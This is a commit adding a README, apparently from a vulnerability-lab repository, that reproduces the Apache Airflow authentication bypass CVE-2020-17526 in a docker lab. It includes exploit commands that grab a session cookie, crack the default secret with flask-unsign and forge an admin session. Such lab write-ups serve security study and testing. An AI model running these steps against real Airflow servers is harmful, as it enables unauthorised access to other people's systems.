first commit

airflow/CVE-2020-17526/README.md

@@ -0,0 +1,56 @@
+# Apache Airflow Authentication Bypass (CVE-2020-17526)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Airflow is an open source, distributed task scheduling framework. Although authentication is not required by default, but the administration can specify the `webserver.authenticate=True` to enable it.
+
+In the version prior to 1.10.13, Apache Airflow uses a default session secert key, which leads to impersonate arbitrary user when authentication is enabled.
+
+References:
+
+- <https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0>
+- <https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise>
+
+## Vulnerability Environment
+
+Execute the following commands to start an airflow 1.10.10 server:
+
+```bash
+#Initialize the database
+docker compose run airflow-init
+
+#Start service
+docker compose up -d
+```
+
+After the server is started, browse the `http://your-ip:8080` to see the login page of Apache Airflow. Yes, this server required authentication.
+
+## Exploit
+
+Firstly, browse the login page and get a session string from Cookie:
+
+```
+curl -v http://localhost:8080/admin/airflow/login
+```
+
+![](1.png)
+
+Then, use [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) to crack the session key:
+
+```
+flask-unsign -u -c [session from Cookie]
+```
+
+![](2.png)
+
+Bingo, we got the valid session key `temporary_key`. Then, use this key to generate a new session whose `user_id` equals to `1`:
+
+```
+flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
+```
+
+![](3.png)
+
+Finally, use this generated session to log in successfully:
+
+![](4.png)